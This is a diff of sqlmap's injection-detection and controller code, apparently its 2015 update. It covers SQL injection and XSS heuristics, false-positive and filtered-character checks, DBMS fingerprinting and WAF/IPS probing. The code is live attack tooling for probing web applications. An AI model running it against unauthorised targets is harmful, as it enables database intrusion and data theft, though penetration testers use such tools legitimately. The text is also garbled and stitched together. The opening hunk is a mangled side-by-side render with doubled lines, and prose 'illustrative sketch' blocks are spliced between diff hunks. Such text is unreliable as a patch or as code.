Backend.forceDbms(dValue[0], True)
|
Backend.forceDbms(dValue[0], True)
|
||||||
|
|
||||||
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
||||||
injection.dbms_version = Backend.setVersion(dValue)
|
injection.dbms_version = Backend.setVersion(dValue)
|
||||||
|
|
||||||
elif dKey == "os" and injection.os is None:
|
elif dKey == "os" and injection.os is None:
|
||||||
injection.os = Backend.setOs(dValue)
|
injection.os = Backend.setOs(dValue)
|
||||||
|
|
||||||
|
@ -565,11 +616,21 @@ def checkSqlInjection(place, parameter, value):
|
||||||
warnMsg = "user aborted during detection phase"
|
warnMsg = "user aborted during detection phase"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit]"
|
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default="S", checkBatch=False)
|
choice = readInput(msg, default="S", checkBatch=False)
|
||||||
|
|
||||||
if choice[0] in ("s", "S"):
|
if choice[0] in ("s", "S"):
|
||||||
pass
|
pass
|
||||||
|
elif choice[0] in ("c", "C"):
|
||||||
|
choice = None
|
||||||
|
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
|
||||||
|
if choice:
|
||||||
|
logger.warn("invalid value")
|
||||||
|
msg = "enter new verbosity level: [0-6] "
|
||||||
|
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
|
||||||
|
conf.verbose = int(choice)
|
||||||
|
setVerbosity()
|
||||||
|
tests.insert(0, test)
|
||||||
elif choice[0] in ("n", "N"):
|
elif choice[0] in ("n", "N"):
|
||||||
return None
|
return None
|
||||||
elif choice[0] in ("e", "E"):
|
elif choice[0] in ("e", "E"):
|
||||||
|
@ -592,22 +653,35 @@ def checkSqlInjection(place, parameter, value):
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
injection = checkFalsePositives(injection)
|
injection = checkFalsePositives(injection)
|
||||||
|
|
||||||
|
if not injection:
|
||||||
|
kb.vulnHosts.remove(conf.hostname)
|
||||||
else:
|
else:
|
||||||
injection = None
|
injection = None
|
||||||
|
|
||||||
if injection:
|
if injection:
|
||||||
checkSuhosinPatch(injection)
|
checkSuhosinPatch(injection)
|
||||||
|
checkFilteredChars(injection)
|
||||||
|
|
||||||
return injection
|
return injection
|
||||||
|
|
||||||
def heuristicCheckDbms(injection):
|
def heuristicCheckDbms(injection):
|
||||||
retVal = None
|
"""
|
||||||
|
This functions is called when boolean-based blind is identified with a
|
||||||
|
generic payload and the DBMS has not yet been fingerprinted to attempt
|
||||||
|
to identify with a simple DBMS specific boolean-based test what the DBMS
|
||||||
|
may be
|
||||||
|
"""
|
||||||
|
retVal = False
|
||||||
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
randStr1, randStr2 = randomStr(), randomStr()
|
|
||||||
|
|
||||||
for dbms in getPublicTypeMembers(DBMS, True):
|
for dbms in getPublicTypeMembers(DBMS, True):
|
||||||
|
if not FROM_DUMMY_TABLE.get(dbms, ""):
|
||||||
|
continue
|
||||||
|
|
||||||
|
randStr1, randStr2 = randomStr(), randomStr()
|
||||||
Backend.forceDbms(dbms)
|
Backend.forceDbms(dbms)
|
||||||
|
|
||||||
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
||||||
|
@ -619,7 +693,7 @@ def heuristicCheckDbms(injection):
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
if retVal:
|
if retVal:
|
||||||
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # not as important as "parsing" counter-part (because of false-positives)
|
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # Not as important as "parsing" counter-part (because of false-positives)
|
||||||
infoMsg += "could be '%s' " % retVal
|
infoMsg += "could be '%s' " % retVal
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
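For context, the reworked heuristicCheckDbms() above walks only those DBMSes that require a dummy-table clause and keeps the first one for which a trivially true SELECT holds at the injection point. An illustrative sketch of that idea (the callback and the two sample table entries are assumptions, not sqlmap's API):

    FROM_DUMMY_TABLE = {"Oracle": " FROM DUAL", "Firebird": " FROM RDB$DATABASE"}

    def guess_dbms(check_boolean_expression, rand="sqlmaptest"):
        for dbms, from_clause in FROM_DUMMY_TABLE.items():
            expr = "(SELECT '%s'%s)='%s'" % (rand, from_clause, rand)
            if check_boolean_expression(expr):
                return dbms  # first DBMS whose dummy-table syntax is accepted
        return False         # mirrors the new False default instead of None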
@@ -632,9 +706,7 @@ def checkFalsePositives(injection):

retVal = injection

-if len(injection.data) == 1 and any(map(lambda x: x in injection.data, [PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED]))\
-or len(injection.data) == 2 and all(map(lambda x: x in injection.data, [PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED])):
-# or len(injection.data) == 1 and 'Generic' in injection.data.values()[0].title and not Backend.getIdentifiedDbms():
+if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data):
pushValue(kb.injection)

infoMsg = "checking if the injection point on %s " % injection.place
@@ -646,19 +718,15 @@ def checkFalsePositives(injection):

kb.injection = injection

-# Simple arithmetic operations which should show basic
-# arithmetic ability of the backend if it's really injectable
-for i in xrange(1 + conf.level / 2):
-randInt1, randInt2, randInt3 = (_() for j in xrange(3))
+for i in xrange(conf.level):
+while True:
+randInt1, randInt2, randInt3 = (_() for j in xrange(3))

randInt1 = min(randInt1, randInt2, randInt3)
randInt3 = max(randInt1, randInt2, randInt3)

-while randInt1 >= randInt2:
-randInt2 = _()
+if randInt3 > randInt2 > randInt1:
+break

-while randInt2 >= randInt3:
-randInt3 = _()

if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
retVal = None
@@ -668,15 +736,15 @@ def checkFalsePositives(injection):
if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:
checkBooleanExpression("%d=%d" % (randInt1, randInt2))

-if checkBooleanExpression("%d>%d" % (randInt1, randInt2)):
+if checkBooleanExpression("%d=%d" % (randInt1, randInt3)):
retVal = None
break

-elif checkBooleanExpression("%d>%d" % (randInt2, randInt3)):
+elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)):
retVal = None
break

-elif not checkBooleanExpression("%d>%d" % (randInt3, randInt1)):
+elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)):
retVal = None
break

@@ -684,13 +752,6 @@ def checkFalsePositives(injection):
warnMsg = "false positive or unexploitable injection point detected"
logger.warn(warnMsg)

-if PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
-if all(_.__name__ != "between" for _ in kb.tamperFunctions):
-warnMsg = "there is a possibility that the character '>' is "
-warnMsg += "filtered by the back-end server. You can try "
-warnMsg += "to rerun with '--tamper=between'"
-logger.warn(warnMsg)

kb.injection = popValue()

return retVal
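The reworked checkFalsePositives() above boils down to asking the suspected blind injection point a few equality questions whose answers are known in advance; a wrong answer marks the point as a false positive. A self-contained sketch of that logic (ask() is a stand-in for sqlmap's checkBooleanExpression()):

    import random

    def looks_like_false_positive(ask):
        while True:
            a, b, c = sorted(random.randint(10, 99) for _ in range(3))
            if a < b < c:
                break
        checks = [("%d=%d" % (a, a), True),
                  ("%d=%d" % (a, c), False),
                  ("%d=%d" % (c, b), False),
                  ("%d=%d" % (b, b), True)]
        return any(ask(expr) != expected for expr, expected in checks)

    truthful = lambda expr: eval(expr.replace("=", "=="))
    print(looks_like_false_positive(truthful))                             # False
    print(looks_like_false_positive(lambda expr: random.random() < 0.5))   # usually True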
@@ -701,35 +762,59 @@ def checkSuhosinPatch(injection):
"""

if injection.place == PLACE.GET:
+debugMsg = "checking for parameter length "
+debugMsg += "constrainting mechanisms"
+logger.debug(debugMsg)

pushValue(kb.injection)

kb.injection = injection
randInt = randomInt()

if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
-warnMsg = "parameter length constraint "
+warnMsg = "parameter length constrainting "
warnMsg += "mechanism detected (e.g. Suhosin patch). "
warnMsg += "Potential problems in enumeration phase can be expected"
logger.warn(warnMsg)

kb.injection = popValue()

+def checkFilteredChars(injection):
+debugMsg = "checking for filtered characters"
+logger.debug(debugMsg)

+pushValue(kb.injection)

+kb.injection = injection
+randInt = randomInt()

+# all other techniques are already using parentheses in tests
+if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
+if not checkBooleanExpression("(%d)=%d" % (randInt, randInt)):
+warnMsg = "it appears that some non-alphanumeric characters (i.e. ()) are "
+warnMsg += "filtered by the back-end server. There is a strong "
+warnMsg += "possibility that sqlmap won't be able to properly "
+warnMsg += "exploit this vulnerability"
+logger.warn(warnMsg)

+# inference techniques depend on character '>'
+if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
+if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
+warnMsg = "it appears that the character '>' is "
+warnMsg += "filtered by the back-end server. You are strongly "
+warnMsg += "advised to rerun with the '--tamper=between'"
+logger.warn(warnMsg)

+kb.injection = popValue()

def heuristicCheckSqlInjection(place, parameter):
if kb.nullConnection:
-debugMsg = "heuristic checking skipped "
-debugMsg += "because NULL connection used"
-logger.debug(debugMsg)
-return None

-if wasLastResponseDBMSError():
-debugMsg = "heuristic checking skipped "
-debugMsg += "because original page content "
-debugMsg += "contains DBMS error"
+debugMsg = "heuristic check skipped because NULL connection used"
logger.debug(debugMsg)
return None

origValue = conf.paramDict[place][parameter]
+paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
prefix = ""
suffix = ""

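A compact sketch of what the new checkFilteredChars() probes for: whether parentheses and the '>' character (which the later inference steps rely on) survive the round trip to the back-end. Helper names here are assumptions, not sqlmap's API:

    import random

    def probe_filtered_chars(ask):
        n = random.randint(10000, 99999)
        findings = []
        if not ask("(%d)=%d" % (n, n)):
            findings.append("parentheses appear to be filtered")
        if not ask("%d>%d" % (n + 1, n)):
            findings.append("'>' appears to be filtered (consider --tamper=between)")
        return findings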
@@ -741,18 +826,23 @@ def heuristicCheckSqlInjection(place, parameter):
suffix = conf.suffix

randStr = ""

while '\'' not in randStr:
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)

+kb.heuristicMode = True

payload = "%s%s%s" % (prefix, randStr, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)

+kb.heuristicMode = False

parseFilePaths(page)
result = wasLastResponseDBMSError()

-infoMsg = "heuristic (basic) test shows that %s " % place
-infoMsg += "parameter '%s' might " % parameter
+infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
+infoMsg += "'%s' might " % parameter

def _(page):
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
@@ -775,7 +865,7 @@ def heuristicCheckSqlInjection(place, parameter):

if casting:
errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type")
-errMsg += "detected (e.g. \"$%s=intval($_REQUEST('%s'))\") " % (parameter, parameter)
+errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter)
errMsg += "at the back-end web application"
logger.error(errMsg)

@@ -793,6 +883,22 @@ def heuristicCheckSqlInjection(place, parameter):
infoMsg += "not be injectable"
logger.warn(infoMsg)

+kb.heuristicMode = True

+value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
+payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
+payload = agent.payload(place, parameter, newValue=payload)
+page, _ = Request.queryPage(payload, place, content=True, raise404=False)

+paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

+if value in (page or ""):
+infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
+infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter
+logger.info(infoMsg)

+kb.heuristicMode = False

return kb.heuristicTest

def checkDynParam(place, parameter, value):
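The heuristic (XSS) check added above works by planting a unique marker containing characters a safe application would normally encode and looking for it verbatim in the response. A rough, self-contained sketch (the appendix value and the fetch() callback are assumptions):

    import random, string

    def xss_heuristic(fetch, appendix="<'\">"):
        rand = lambda: "".join(random.choice(string.ascii_lowercase) for _ in range(6))
        marker = "%s%s%s" % (rand(), appendix, rand())
        page = fetch("'" + marker) or ""
        return marker in page  # reflected verbatim -> possible XSS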
@@ -809,7 +915,9 @@ def checkDynParam(place, parameter, value):
dynResult = None
randInt = randomInt()

-infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
+paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

+infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
logger.info(infoMsg)

try:
@@ -817,7 +925,7 @@ def checkDynParam(place, parameter, value):
dynResult = Request.queryPage(payload, place, raise404=False)

if not dynResult:
-infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
+infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
logger.info(infoMsg)

randInt = randomInt()
@@ -1009,52 +1117,38 @@ def checkWaf():
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
"""

-if not conf.checkWaf:
-return False
+if any((conf.string, conf.notString, conf.regexp)):
+return None

-infoMsg = "heuristic checking if the target is protected by "
-infoMsg += "some kind of WAF/IPS/IDS"
-logger.info(infoMsg)
+dbmMsg = "heuristically checking if the target is protected by "
+dbmMsg += "some kind of WAF/IPS/IDS"
+logger.debug(dbmMsg)

retVal = False
+payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)

-backup = dict(conf.parameters)
+value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
+value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))

-conf.parameters = dict(backup)
-conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)
-kb.matchRatio = None
-Request.queryPage()
+try:
+retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+except SqlmapConnectionException:
+retVal = True
+finally:
+kb.matchRatio = None

-if kb.errorIsNone and kb.matchRatio is None:
-kb.matchRatio = LOWER_RATIO_BOUND

-conf.parameters = dict(backup)
-conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt())

-trueResult = Request.queryPage()

-if trueResult:
-conf.parameters = dict(backup)
-conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)

-falseResult = Request.queryPage()

-if not falseResult:
-retVal = True

-conf.parameters = dict(backup)

if retVal:
-warnMsg = "it appears that the target is protected. Please "
-warnMsg += "consider usage of tamper scripts (option '--tamper')"
-logger.warn(warnMsg)
-else:
-infoMsg = "it appears that the target is not protected"
-logger.info(infoMsg)
+warnMsg = "heuristics detected that the target "
+warnMsg += "is protected by some kind of WAF/IPS/IDS"
+logger.critical(warnMsg)

+if not conf.identifyWaf:
+message = "do you want sqlmap to try to detect backend "
+message += "WAF/IPS/IDS? [y/N] "
+output = readInput(message, default="N")

+if output and output[0] in ("Y", "y"):
+conf.identifyWaf = True

return retVal

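The rewritten checkWaf() above no longer replays a clean/dirty request pair; it appends a single noisy dummy parameter and flags protection when the response similarity ratio drops below a threshold (or the connection is dropped). An illustrative sketch with assumed helper names and a representative, not literal, payload and threshold:

    import difflib

    NOISY_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,table_name FROM information_schema.tables"
    RATIO_THRESHOLD = 0.5

    def waf_suspected(fetch, original_page):
        try:
            page = fetch("sqlmaptest=1 %s" % NOISY_PAYLOAD)  # fetch() returns the page body
        except IOError:                                      # a dropped connection counts too
            return True
        return difflib.SequenceMatcher(None, original_page, page).ratio() < RATIO_THRESHOLD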
@@ -1072,6 +1166,8 @@ def identifyWaf():
def _(*args, **kwargs):
page, headers, code = None, None, None
try:
+pushValue(kb.redirectChoice)
+kb.redirectChoice = REDIRECTION.NO
if kwargs.get("get"):
kwargs["get"] = urlencode(kwargs["get"])
kwargs["raise404"] = False
@@ -1079,6 +1175,8 @@ def identifyWaf():
page, headers, code = Request.getPage(*args, **kwargs)
except Exception:
pass
+finally:
+kb.redirectChoice = popValue()
return page or "", headers or {}, code

retVal = False
@@ -1088,7 +1186,7 @@ def identifyWaf():
logger.debug("checking for WAF/IDS/IPS product '%s'" % product)
found = function(_)
except Exception, ex:
-errMsg = "exception occured while running "
+errMsg = "exception occurred while running "
errMsg += "WAF script for '%s' ('%s')" % (product, ex)
logger.critical(errMsg)

@@ -1110,9 +1208,10 @@ def identifyWaf():
if output and output[0] not in ("Y", "y"):
raise SqlmapUserQuitException
else:
-infoMsg = "no WAF/IDS/IPS product has been identified"
-logger.info(infoMsg)
+warnMsg = "no WAF/IDS/IPS product has been identified"
+logger.warn(warnMsg)

+kb.testType = None
kb.testMode = False

return retVal
@@ -1168,10 +1267,16 @@ def checkNullConnection():
def checkConnection(suppressOutput=False):
if not any((conf.proxy, conf.tor, conf.dummy)):
try:
+debugMsg = "resolving hostname '%s'" % conf.hostname
+logger.debug(debugMsg)
socket.getaddrinfo(conf.hostname, None)
except socket.gaierror:
errMsg = "host '%s' does not exist" % conf.hostname
raise SqlmapConnectionException(errMsg)
+except socket.error, ex:
+errMsg = "problem occurred while "
+errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getUnicode(ex))
+raise SqlmapConnectionException(errMsg)

if not suppressOutput and not conf.dummy:
infoMsg = "testing connection to the target URL"
@@ -1198,9 +1303,6 @@ def checkConnection(suppressOutput=False):
kb.errorIsNone = True

except SqlmapConnectionException, errMsg:
-errMsg = getUnicode(errMsg)
-logger.critical(errMsg)

if conf.ipv6:
warnMsg = "check connection to a provided "
warnMsg += "IPv6 address with a tool like ping6 "
@@ -1210,6 +1312,9 @@ def checkConnection(suppressOutput=False):
singleTimeWarnMessage(warnMsg)

if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )):
+errMsg = getUnicode(errMsg)
+logger.critical(errMsg)

if conf.multipleTargets:
return False

@@ -1222,3 +1327,6 @@ def checkConnection(suppressOutput=False):
raise

return True

+def setVerbosity(): # Cross-linked function
+raise NotImplementedError

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -20,6 +20,7 @@ from lib.controller.checks import checkWaf
from lib.controller.checks import heuristicCheckSqlInjection
from lib.controller.checks import identifyWaf
from lib.core.agent import agent
+from lib.core.common import dataToStdout
from lib.core.common import extractRegexResult
from lib.core.common import getFilteredPageContent
from lib.core.common import getPublicTypeMembers
@@ -27,7 +28,10 @@ from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
+from lib.core.common import isListLike
from lib.core.common import parseTargetUrl
+from lib.core.common import popValue
+from lib.core.common import pushValue
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import safeCSValue
@@ -54,6 +58,7 @@ from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
from lib.core.settings import IGNORE_PARAMETERS
from lib.core.settings import LOW_TEXT_PERCENT
+from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
from lib.core.settings import HOST_ALIASES
from lib.core.settings import REFERER_ALIASES
from lib.core.settings import USER_AGENT_ALIASES
@@ -124,8 +129,8 @@ def _selectInjection():
kb.injection = kb.injections[index]

def _formatInjection(inj):
-data = "Place: %s\n" % inj.place
-data += "Parameter: %s\n" % inj.parameter
+paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
+data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)

for stype, sdata in inj.data.items():
title = sdata.title
@@ -144,7 +149,7 @@ def _formatInjection(inj):
vector = "%s%s" % (vector, comment)
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
data += " Title: %s\n" % title
-data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
+data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"

return data
@@ -187,7 +192,9 @@ def _randomFillBlankFields(value):
return retVal

def _saveToHashDB():
-injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []
+injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
+if not isListLike(injections):
+injections = []
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)

_ = dict()
@@ -249,7 +256,7 @@ def start():
return True

if conf.url and not any((conf.forms, conf.crawlDepth)):
-kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
+kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))

if conf.configFile and not kb.targets:
errMsg = "you did not edit the configuration file properly, set "
@@ -262,13 +269,16 @@ def start():
logger.info(infoMsg)

hostCount = 0
+initialHeaders = list(conf.httpHeaders)

-for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
+for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
try:
conf.url = targetUrl
-conf.method = targetMethod
+conf.method = targetMethod.upper() if targetMethod else targetMethod
conf.data = targetData
conf.cookie = targetCookie
+conf.httpHeaders = list(initialHeaders)
+conf.httpHeaders.extend(targetHeaders or [])

initTargetEnv()
parseTargetUrl()
@@ -276,7 +286,7 @@ def start():
testSqlInj = False

if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]):
-for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (conf.pDel or DEFAULT_GET_POST_DELIMITER, conf.pDel or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
+for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])

if paramKey not in kb.testedParams:
||||||
|
@ -287,7 +297,13 @@ def start():
|
||||||
if paramKey not in kb.testedParams:
|
if paramKey not in kb.testedParams:
|
||||||
testSqlInj = True
|
testSqlInj = True
|
||||||
|
|
||||||
testSqlInj &= conf.hostname not in kb.vulnHosts
|
if testSqlInj and conf.hostname in kb.vulnHosts:
|
||||||
|
if kb.skipVulnHost is None:
|
||||||
|
message = "SQL injection vulnerability has already been detected "
|
||||||
|
message += "against '%s'. Do you want to skip " % conf.hostname
|
||||||
|
message += "further tests involving it? [Y/n]"
|
||||||
|
kb.skipVulnHost = readInput(message, default="Y").upper() != 'N'
|
||||||
|
testSqlInj = not kb.skipVulnHost
|
||||||
|
|
||||||
if not testSqlInj:
|
if not testSqlInj:
|
||||||
infoMsg = "skipping '%s'" % targetUrl
|
infoMsg = "skipping '%s'" % targetUrl
|
||||||
|
@ -300,13 +316,13 @@ def start():
|
||||||
if conf.forms:
|
if conf.forms:
|
||||||
message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
|
message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
|
||||||
else:
|
else:
|
||||||
message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
||||||
|
|
||||||
if conf.cookie:
|
if conf.cookie:
|
||||||
message += "\nCookie: %s" % conf.cookie
|
message += "\nCookie: %s" % conf.cookie
|
||||||
|
|
||||||
if conf.data is not None:
|
if conf.data is not None:
|
||||||
message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
|
message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
|
||||||
|
|
||||||
if conf.forms:
|
if conf.forms:
|
||||||
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
||||||
|
@ -316,13 +332,13 @@ def start():
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
|
|
||||||
if not test or test[0] in ("y", "Y"):
|
if not test or test[0] in ("y", "Y"):
|
||||||
if conf.method == HTTPMETHOD.POST:
|
if conf.method != HTTPMETHOD.GET:
|
||||||
message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
||||||
conf.data = readInput(message, default=conf.data)
|
conf.data = readInput(message, default=conf.data)
|
||||||
conf.data = _randomFillBlankFields(conf.data)
|
conf.data = _randomFillBlankFields(conf.data)
|
||||||
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||||
|
|
||||||
elif conf.method == HTTPMETHOD.GET:
|
else:
|
||||||
if targetUrl.find("?") > -1:
|
if targetUrl.find("?") > -1:
|
||||||
firstPart = targetUrl[:targetUrl.find("?")]
|
firstPart = targetUrl[:targetUrl.find("?")]
|
||||||
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
||||||
|
@ -345,6 +361,7 @@ def start():
|
||||||
if not test or test[0] in ("y", "Y"):
|
if not test or test[0] in ("y", "Y"):
|
||||||
pass
|
pass
|
||||||
elif test[0] in ("n", "N"):
|
elif test[0] in ("n", "N"):
|
||||||
|
dataToStdout(os.linesep)
|
||||||
continue
|
continue
|
||||||
elif test[0] in ("q", "Q"):
|
elif test[0] in ("q", "Q"):
|
||||||
break
|
break
|
||||||
|
@ -357,8 +374,7 @@ def start():
|
||||||
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
|
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if conf.checkWaf:
|
checkWaf()
|
||||||
checkWaf()
|
|
||||||
|
|
||||||
if conf.identifyWaf:
|
if conf.identifyWaf:
|
||||||
identifyWaf()
|
identifyWaf()
|
||||||
|
@ -416,6 +432,8 @@ def start():
|
||||||
|
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
|
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
for parameter, value in paramDict.items():
|
for parameter, value in paramDict.items():
|
||||||
if not proceed:
|
if not proceed:
|
||||||
break
|
break
|
||||||
|
@ -427,7 +445,7 @@ def start():
|
||||||
if paramKey in kb.testedParams:
|
if paramKey in kb.testedParams:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif parameter in conf.testParameter:
|
elif parameter in conf.testParameter:
|
||||||
|
@ -436,45 +454,60 @@ def start():
|
||||||
elif parameter == conf.rParam:
|
elif parameter == conf.rParam:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
